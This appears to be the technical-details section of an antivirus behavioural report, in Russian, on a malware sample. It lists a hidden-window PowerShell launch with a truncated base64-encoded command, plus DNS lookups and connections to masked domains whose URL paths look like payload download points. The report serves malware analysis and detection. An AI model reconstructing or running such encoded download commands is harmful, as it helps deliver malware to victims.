Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAFoAWgBBAEEAawBBADQAPQAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBpAEEAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAYwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHgAJwAsACcAQQBCADQAJwApACkAKQA7ACQAR...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1544
- %TEMP%\1180646.cvr
- 'mc####donesia.com':80
- 'mc####donesia.com':443
- 'sr####ovision.com':80
- 'sr####ovision.com':443
- 'be####metals.com':80
- 'la#####foundation.com':80
- 'be##2.com':80
- 'be##2.com':443
- http://mc####donesia.com/wp-content/KL/
- http://www.sr####ovision.com/vendor/cLVXG/
- http://be####metals.com/tgf/ZL/
- http://la#####foundation.com/images/YPtcX/
- http://be##2.com/sircuss/cvO7/
- 'mc####donesia.com':443
- 'sr####ovision.com':443
- 'be##2.com':443
- DNS ASK mc####donesia.com
- DNS ASK sr####ovision.com
- DNS ASK be####metals.com
- DNS ASK la#####foundation.com
- DNS ASK be##2.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAFoAWgBBAEEAawBBADQAPQAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBpAEEAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAYwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHgAJwAsACcAQQBCADQAJwApACkAKQA7ACQAR...' (со скрытым окном)